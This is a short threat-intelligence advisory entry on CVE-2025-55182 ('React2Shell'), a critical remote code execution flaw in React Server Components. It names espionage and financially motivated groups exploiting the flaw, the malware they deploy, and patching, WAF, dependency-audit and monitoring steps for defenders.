Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
Essential information
- Published
- 13/12/2025 10:37
- Modified
- 21/12/2025 19:03
- Tags
- 2025-12-13 CVE-2025-55182 react2shell remote code execution
- Related entities
- 5 vulnerabilities (cve), 7 observables, 17 techniques (mitre), 6 malware, 9 others
Description
A critical remote code execution vulnerability in React Server Components, CVE-2025-55182, has been widely exploited by various threat actors. China-nexus espionage groups and financially motivated actors have been observed leveraging this vulnerability to deploy malware such as MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, COMPOOD backdoor, and XMRIG cryptocurrency miners. The vulnerability affects multiple versions of React packages and has a CVSS score of 10.0. Exploitation chains include the use of bash scripts, cURL, and wget to download and execute payloads. Affected organizations are advised to patch immediately, deploy WAF rules, audit dependencies, monitor network traffic, and hunt for indicators of compromise.